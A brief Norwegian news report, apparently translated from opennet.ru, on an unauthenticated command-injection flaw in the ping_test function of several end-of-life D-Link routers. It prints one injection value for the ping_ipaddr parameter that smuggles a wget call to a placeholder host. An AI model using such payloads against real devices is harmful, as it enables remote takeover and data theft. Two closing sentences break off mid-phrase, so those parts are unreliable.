I D-Link trådløse rutere
Interessant nok, ifølge fastvareutviklerne, skal "ping_test"-kallet bare utføres etter autentisering, men i virkeligheten kalles det i alle fall, uavhengig av å logge på nettgrensesnittet. Spesielt når du får tilgang til application_sec.cgi-skriptet og sender «action=ping_test»-parameteren, omdirigerer skriptet til autentiseringssiden, men utfører samtidig handlingen knyttet til ping_test. For å utføre koden ble en annen sårbarhet brukt i selve ping_test, som kaller opp ping-verktøyet uten å kontrollere riktigheten til IP-adressen som ble sendt til testing. For for eksempel å kalle opp wget-verktøyet og overføre resultatene av "echo 1234"-kommandoen til en ekstern vert, spesifiser bare parameteren "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Tilstedeværelsen av sårbarheten er offisielt bekreftet i følgende modeller:
- DIR-655 med fastvare 3.02b05 eller eldre;
- DIR-866L med fastvare 1.03b04 eller eldre;
- DIR-1565 med fastvare 1.01 eller eldre;
- DIR-652 (ingen informasjon om problematiske fastvareversjoner er gitt)
Støtteperioden for disse modellene er allerede utløpt, så D-Link
Det ble senere oppdaget at sårbarheten også var det
Kilde: opennet.ru